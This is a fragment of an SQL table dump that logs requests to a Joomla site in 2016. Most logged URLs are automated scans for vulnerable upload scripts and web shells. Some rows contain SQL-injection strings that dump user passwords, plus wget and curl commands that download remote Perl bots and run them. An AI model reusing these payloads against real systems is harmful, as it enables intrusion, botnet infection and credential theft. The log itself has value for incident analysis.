00:00:00',301),(8292,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',1,0,'2016-10-04 16:02:08','0000-00-00 00:00:00',301),(8293,'http://www.3s-technologies.com.tr/index.php/en/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',1,0,'2016-10-04 16:02:09','0000-00-00 00:00:00',301),(8294,'http://www.3s-technologies.com.tr/index.php/en/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-10-04 16:02:10','0000-00-00 00:00:00',301),(8295,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-1/inc/upload.php','','','',1,0,'2016-10-04 16:02:12','0000-00-00 00:00:00',301),(8296,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-2/inc/upload.php','','','',1,0,'2016-10-04 16:02:12','0000-00-00 00:00:00',301),(8297,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-3/inc/upload.php','','','',1,0,'2016-10-04 16:02:13','0000-00-00 00:00:00',301),(8298,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-4/inc/upload.php','','','',1,0,'2016-10-04 16:02:13','0000-00-00 00:00:00',301),(8299,'http://www.3s-technologies.com.tr/index.php/en/components/com_sexycontactform/fileupload/index.php','','','',1,0,'2016-10-04 16:02:14','0000-00-00 00:00:00',301),(8300,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-5/inc/upload.php','','','',1,0,'2016-10-04 16:02:14','0000-00-00 00:00:00',301),(8301,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-6/inc/upload.php','','','',1,0,'2016-10-04 16:02:15','0000-00-00 00:00:00',301),(8302,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-7/inc/upload.php','','','',1,0,'2016-10-04 16:02:15','0000-00-00 00:00:00',301),(8303,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-8/inc/upload.php','','','',1,0,'2016-10-04 16:02:15','0000-00-00 00:00:00',301),(8304,'http://www.3s-technologies.com.tr/index.php/en/components/com_creativecontactform/fileupload/index.php','','','',1,0,'2016-10-04 16:02:16','0000-00-00 00:00:00',301),(8305,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-9/inc/upload.php','','','',1,0,'2016-10-04 16:02:16','0000-00-00 00:00:00',301),(8306,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-10/inc/upload.php','','','',1,0,'2016-10-04 16:02:17','0000-00-00 00:00:00',301),(8307,'http://www.3s-technologies.com.tr/index.php/en/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2016-10-04 16:02:18','0000-00-00 00:00:00',301),(8308,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-11/inc/upload.php','','','',1,0,'2016-10-04 16:02:18','0000-00-00 00:00:00',301),(8309,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-12/inc/upload.php','','','',1,0,'2016-10-04 16:02:19','0000-00-00 00:00:00',301),(8310,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-13/inc/upload.php','','','',1,0,'2016-10-04 16:02:19','0000-00-00 00:00:00',301),(8311,'http://www.3s-technologies.com.tr/index.php/en//components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',1,0,'2016-10-04 16:02:20','0000-00-00 00:00:00',301),(8312,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-14/inc/upload.php','','','',1,0,'2016-10-04 16:02:24','0000-00-00 00:00:00',301),(8313,'http://www.3s-technologies.com.tr/index.php/en/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2016-10-04 16:02:25','0000-00-00 00:00:00',301),(8314,'http://www.3s-technologies.com.tr/index.php/en/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2016-10-04 16:02:26','0000-00-00 00:00:00',301),(8315,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-15/inc/upload.php','','','',1,0,'2016-10-04 16:02:26','0000-00-00 00:00:00',301),(8316,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-16/inc/upload.php','','','',1,0,'2016-10-04 16:02:26','0000-00-00 00:00:00',301),(8317,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-17/inc/upload.php','','','',1,0,'2016-10-04 16:02:27','0000-00-00 00:00:00',301),(8318,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-18/inc/upload.php','','','',1,0,'2016-10-04 16:02:27','0000-00-00 00:00:00',301),(8319,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-19/inc/upload.php','','','',1,0,'2016-10-04 16:02:28','0000-00-00 00:00:00',301),(8320,'http://www.3s-technologies.com.tr/index.php/en//cfg-contactform-20/inc/upload.php','','','',1,0,'2016-10-04 16:02:28','0000-00-00 00:00:00',301),(8321,'http://3s-technologies.com.tr///index.php?option=com_adsmanager&task=upload&tmpl=component','','','',2,0,'2016-10-04 17:50:44','0000-00-00 00:00:00',301),(8322,'http://3s-technologies.com.tr//index.php?option=com_myblog&task=ajaxupload','','','',20,0,'2016-10-04 17:50:49','0000-00-00 00:00:00',301),(8323,'http://3s-technologies.com.tr//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',6,0,'2016-10-04 17:50:54','0000-00-00 00:00:00',301),(8324,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/images/stories/petx.php?baca','','','',1,0,'2016-10-05 21:56:31','0000-00-00 00:00:00',301),(8325,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/images/stories/explore.php?baca','','','',1,0,'2016-10-05 21:56:34','0000-00-00 00:00:00',301),(8326,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/images/stories/magic.php.png','','','',1,0,'2016-10-05 21:56:56','0000-00-00 00:00:00',301),(8327,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/images/stories/magic.php.png?baca','','','',1,0,'2016-10-05 21:56:58','0000-00-00 00:00:00',301),(8328,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component//images/stories/explore.gif','','','',2,0,'2016-10-07 15:34:40','0000-00-00 00:00:00',301),(8329,'https://www.dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-10-08 08:42:51','0000-00-00 00:00:00',301),(8330,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:13','0000-00-00 00:00:00',301),(8331,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:15','0000-00-00 00:00:00',301),(8332,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:15','0000-00-00 00:00:00',301),(8333,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:17','0000-00-00 00:00:00',301),(8334,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:18','0000-00-00 00:00:00',301),(8335,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:19','0000-00-00 00:00:00',301),(8336,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:20','0000-00-00 00:00:00',301),(8337,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:21','0000-00-00 00:00:00',301),(8338,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:22','0000-00-00 00:00:00',301),(8339,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:24','0000-00-00 00:00:00',301),(8340,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:25','0000-00-00 00:00:00',301),(8341,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:26','0000-00-00 00:00:00',301),(8342,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:27','0000-00-00 00:00:00',301),(8343,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:29','0000-00-00 00:00:00',301),(8344,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:32','0000-00-00 00:00:00',301),(8345,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:33','0000-00-00 00:00:00',301),(8346,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:35','0000-00-00 00:00:00',301),(8347,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:36','0000-00-00 00:00:00',301),(8348,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:37','0000-00-00 00:00:00',301),(8349,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:40','0000-00-00 00:00:00',301),(8350,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:45','0000-00-00 00:00:00',301),(8351,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:47','0000-00-00 00:00:00',301),(8352,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',1,0,'2016-10-09 00:53:48','0000-00-00 00:00:00',301),(8353,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/users-component/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',1,0,'2016-10-09 00:53:50','0000-00-00 00:00:00',301),(8354,'http://www.3s-technologies.com.tr/index.php?tmp=9ddae0&option=com_tags','','http://www.3s-technologies.com.tr/','',1,0,'2016-10-10 14:46:53','0000-00-00 00:00:00',301),(8355,'https://www.dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2016-10-12 18:01:34','0000-00-00 00:00:00',301),(8356,'http://3s-technologies.com.tr/index.php/en/components/com_jsmusic/js/uploadify/swfobject.js','','http://3s-technologies.com.tr/index.php/en/components/com_jsmusic/js/uploadify/swfobject.js','',1,0,'2016-10-13 02:55:11','0000-00-00 00:00:00',301),(8357,'http://3s-technologies.com.tr/index.php/en/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','http://3s-technologies.com.tr/index.php/en/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',1,0,'2016-10-13 10:35:37','0000-00-00 00:00:00',301),(8358,'http://www.3s-technologies.com.tr/index.php?option=com_tag&task=tag&tag=999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from jos_users--+a','','http://www.3s-technologies.com.tr/index.php?option=com_tag&task=tag&tag=999999.9%27%20union%20all%20select%201,concat(0x3c757365723e,username,0x3c7573','',1,0,'2016-10-13 17:31:46','0000-00-00 00:00:00',301),(8359,'http://www.3s-technologies.com.tr/index.php?Itemid=1&option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)KHG,4,5,6,7,8,9,10+from+jos_users--','','http://www.3s-technologies.com.tr/index.php?Itemid=1&option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3','',1,0,'2016-10-13 18:15:26','0000-00-00 00:00:00',301),(8360,'http://www.3s-technologies.com.tr/index.php?option=com_user&task=register','','','',1,0,'2016-10-16 23:49:04','0000-00-00 00:00:00',301),(8361,'http://www.3s-technologies.com.tr/index.php/joomla/other-components/registration-form','','','',1,0,'2016-10-16 23:49:04','0000-00-00 00:00:00',301),(8362,'http://3s-technologies.com.tr/index.php/en/modules/mod_ppc_simple_spotlight/elements/upload_file.php','','http://3s-technologies.com.tr/index.php/en/modules/mod_ppc_simple_spotlight/elements/upload_file.php','',2,0,'2016-10-18 09:08:30','0000-00-00 00:00:00',301),(8363,'http://3s-technologies.com.tr/index.php/en/administrator/index.php','','','',6,0,'2016-10-20 10:56:02','0000-00-00 00:00:00',301),(8364,'http://3s-technologies.com.tr/index.php/en/?option=com_user&view=registration','','','',2,0,'2016-10-20 18:04:00','0000-00-00 00:00:00',301),(8365,'http://www.3s-technologies.com.tr/index.php?option=com_easybookreloaded&view=easybookreloaded','','http://www.3s-technologies.com.tr/index.php?option=com_easybookreloaded&view=easybookreloaded','',1,0,'2016-10-24 01:14:35','0000-00-00 00:00:00',301),(8366,'http://www.3s-technologies.com.tr/index.php/admin','','','',2,0,'2016-10-25 21:08:26','0000-00-00 00:00:00',301),(8367,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/index.php/admin','','','',1,0,'2016-10-25 21:08:32','0000-00-00 00:00:00',301),(8368,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/app/etc/local.xml','','','',1,0,'2016-10-25 21:08:33','0000-00-00 00:00:00',301),(8369,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/api/xmlrpc','','','',1,0,'2016-10-25 21:08:34','0000-00-00 00:00:00',301),(8370,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//skin/error.php','','','',1,0,'2016-10-25 21:08:35','0000-00-00 00:00:00',301),(8371,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//Neko.php','','','',1,0,'2016-10-25 21:08:36','0000-00-00 00:00:00',301),(8372,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//skin/skinwizard.php','','','',2,0,'2016-10-25 21:08:37','0000-00-00 00:00:00',301),(8373,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//skin/Signedint.php','','','',1,0,'2016-10-25 21:08:39','0000-00-00 00:00:00',301),(8374,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//js/eX2.php','','','',1,0,'2016-10-25 21:08:40','0000-00-00 00:00:00',301),(8375,'http://3s-technologies.com.tr/index.php?option=com_attachments&task=upload','','','',1,0,'2016-10-26 21:09:26','0000-00-00 00:00:00',301),(8376,'http://www.3s-technologies.com.tr/index.php?option=com_attachments&task=upload','','','',1,0,'2016-10-26 21:18:34','0000-00-00 00:00:00',301),(8377,'http://www.3s-technologies.com.tr/index.php?option=com_akobook','','http://www.3s-technologies.com.tr/index.php?option=com_akobook','',1,0,'2016-10-26 21:53:47','0000-00-00 00:00:00',301),(8378,'https://www.dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',1,0,'2016-10-28 16:56:55','0000-00-00 00:00:00',301),(8379,'http://3s-technologies.com.tr/index.php/author-login','','','',5,0,'2016-10-28 23:25:28','0000-00-00 00:00:00',301),(8380,'http://3s-technologies.com.tr/?option=com_user&view=register','','http://3s-technologies.com.tr/?option=com_user&view=register','',7,0,'2016-10-29 06:31:16','0000-00-00 00:00:00',301),(8381,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/index.php/admin','','','',1,0,'2016-10-29 19:24:14','0000-00-00 00:00:00',301),(8382,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/app/etc/local.xml','','','',1,0,'2016-10-29 19:24:15','0000-00-00 00:00:00',301),(8383,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories/api/xmlrpc','','','',1,0,'2016-10-29 19:24:16','0000-00-00 00:00:00',301),(8384,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories//downloader/','','','',1,0,'2016-10-29 19:24:20','0000-00-00 00:00:00',301),(8385,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories//downloader/index.php?A=connectInstallPackageUpload&maintenance=1&archive_type=0&backup_name=','','','',1,0,'2016-10-29 19:24:21','0000-00-00 00:00:00',301),(8386,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/article-categories//Neko.php','','','',1,0,'2016-10-29 19:24:23','0000-00-00 00:00:00',301),(8387,'http://www.3s-technologies.com.tr/index.php?option=com_easygb','','http://www.3s-technologies.com.tr/index.php?option=com_easygb','',1,0,'2016-11-03 14:51:16','0000-00-00 00:00:00',301),(8388,'http://www.3s-technologies.com.tr/index.php?option=com_jomclassifieds&view=categories','','http://www.3s-technologies.com.tr/index.php?option=com_jomclassifieds&view=categories','',1,0,'2016-11-04 14:49:44','0000-00-00 00:00:00',301),(8389,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/wp-content/themes/smallfolio/phpThumb_1.7.9/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; wget http://www.wimvandiem.nl/wp-conten','','','',1,0,'2016-11-05 04:42:09','0000-00-00 00:00:00',301),(8390,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/wp-content/themes/smallfolio/phpThumb_1.7.9/pagat.txt','','','',1,0,'2016-11-05 04:42:10','0000-00-00 00:00:00',301),(8391,'http://www.3s-technologies.com.tr/index.php?option=com_lyftenbloggie&view=lyftenbloggie','','http://www.3s-technologies.com.tr/index.php?option=com_lyftenbloggie&view=lyftenbloggie','',1,0,'2016-11-05 22:14:37','0000-00-00 00:00:00',301),(8392,'http://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr','','','',1,0,'2016-11-07 12:38:42','0000-00-00 00:00:00',301),(8393,'http://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk','','','',1,0,'2016-11-07 12:42:51','0000-00-00 00:00:00',301),(8394,'http://www.3s-technologies.com.tr/index.php?option=com_easydiscuss&view=index','','http://www.3s-technologies.com.tr/index.php?option=com_easydiscuss&view=index','',1,0,'2016-11-08 01:09:01','0000-00-00 00:00:00',301),(8395,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component/js/lib/ccard.js','','','',1,0,'2016-11-10 17:49:18','0000-00-00 00:00:00',301),(8396,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/content-component//app/etc/local.xml','','','',1,0,'2016-11-10 17:49:21','0000-00-00 00:00:00',301),(8397,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/images/stories/petx.php?baca','','','',1,0,'2016-11-11 23:33:18','0000-00-00 00:00:00',301),(8398,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/images/stories/explore.php?baca','','','',1,0,'2016-11-11 23:33:28','0000-00-00 00:00:00',301),(8399,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/components/images/stories/magic.php.png','','','',1,0,'2016-11-11 23:34:04','0000-00-00 00:00:00',301),(8400,'http://proneo-led.com/3s-technologies.com.tr/joomla//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-11-14 14:02:32','0000-00-00 00:00:00',301),(8401,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/26-park-site&amp;sa=U&amp;ved=0ahUKEwiOyK-5k6rQAhXBDxoKHSE9AbsQFgjSAzBb&amp;usg=AFQjCNGprJmHhea-f91Dn7-UEI6TZV0ctw/404.php','','','',1,0,'2016-11-15 08:13:50','0000-00-00 00:00:00',301),(8402,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/26-park-site&amp;sa=U&amp;ved=0ahUKEwiOyK-5k6rQAhXBDxoKHSE9AbsQFgjSAzBb&amp;usg=AFQjCNGprJmHhea-f91Dn7-UEI6TZV0ctw/404.php?shxxx=wget ht','','','',1,0,'2016-11-15 08:13:51','0000-00-00 00:00:00',301),(8403,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories//tmp/plupload/myluph.php?cmd=curl+-C+-+-O+http://www.tonerbazis.hu/bot.txt;perl+bot.txt;rm+bot.txt','','','',1,0,'2016-11-15 08:14:12','0000-00-00 00:00:00',301),(8404,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories//tmp/plupload/myluph.php','','','',1,0,'2016-11-15 08:14:13','0000-00-00 00:00:00',301),(8405,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/index.inc.php','','','',1,0,'2016-11-15 08:14:13','0000-00-00 00:00:00',301),(8406,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.t','','','',1,0,'2016-11-15 08:14:14','0000-00-00 00:00:00',301),(8407,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/logs/index.inc.php','','','',1,0,'2016-11-15 08:14:14','0000-00-00 00:00:00',301),(8408,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/logs/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl ','','','',1,0,'2016-11-15 08:14:15','0000-00-00 00:00:00',301),(8409,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/tmp/plupload/index.inc.php','','','',1,0,'2016-11-15 08:14:15','0000-00-00 00:00:00',301),(8410,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/tmp/plupload/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt','','','',1,0,'2016-11-15 08:14:16','0000-00-00 00:00:00',301),(8411,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/404.php','','','',1,0,'2016-11-15 08:14:16','0000-00-00 00:00:00',301),(8412,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/404.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ; p','','','',1,0,'2016-11-15 08:14:16','0000-00-00 00:00:00',301),(8413,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/index.inc.php','','','',1,0,'2016-11-15 08:14:17','0000-00-00 00:00:00',301),(8414,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl ','','','',1,0,'2016-11-15 08:14:17','0000-00-00 00:00:00',301),(8415,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/petx.php','','','',1,0,'2016-11-15 08:14:18','0000-00-00 00:00:00',301),(8416,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/petx.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.t','','','',1,0,'2016-11-15 08:14:18','0000-00-00 00:00:00',301),(8417,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/mil.php','','','',1,0,'2016-11-15 08:14:19','0000-00-00 00:00:00',301),(8418,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/com_adsmanager/ads/uploaded/mil.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;p','','','',1,0,'2016-11-15 08:14:19','0000-00-00 00:00:00',301),(8419,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/readme.php','','','',1,0,'2016-11-15 08:14:20','0000-00-00 00:00:00',301),(8420,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/readme.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.t','','','',1,0,'2016-11-15 08:14:20','0000-00-00 00:00:00',301),(8421,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/index.inc.php','','','',1,0,'2016-11-15 08:14:21','0000-00-00 00:00:00',301),(8422,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/components/index.inc.php?shxxx=wget http://www.fia.com.gr/wp-content/uploads/2010/doc.txt ; perl doc.txt ; perl doc.txt ; perl doc.txt ;','','','',1,0,'2016-11-15 08:14:21','0000-00-00 00:00:00',301),(8423,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/tmp/plupload/millo.php','','','',1,0,'2016-11-15 08:14:22','0000-00-00 00:00:00',301),(8424,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/tmp/plupload/millo.php?cmd=cd /tmp;wget http://www.federacia.by/xmlrpc/includes/.../os.txt;perl os.txt;perl os.txt;perl os.txt;perl os.t','','','',1,0,'2016-11-15 08:14:22','0000-00-00 00:00:00',301),(8425,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/26-park-site&amp;sa=U&amp;ved=0ahUKEwj0p4-7k6rQAhVDiRoKHfjSDrg4MhAWCOcBMCk&amp;usg=AFQjCNGprJmHhea-f91Dn7-UEI6TZV0ctw/404.php','','','',1,0,'2016-11-15 08:41:24','0000-00-00 00:00:00',301),(8426,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/26-park-site&amp;sa=U&amp;ved=0ahUKEwj0p4-7k6rQAhVDiRoKHfjSDrg4MhAWCOcBMCk&amp;usg=AFQjCNGprJmHhea-f91Dn7-UEI6TZV0ctw/404.php?shxxx=wget','','','',1,0,'2016-11-15 08:41:24','0000-00-00 00:00:00',301),(8427,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwjurPX6kqrQAhUFso8KHf2hCB44ZBAWCOEDMF4&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A//tmp/plupload/myluph.php?cmd=cu','','','',1,0,'2016-11-15 15:58:47','0000-00-00 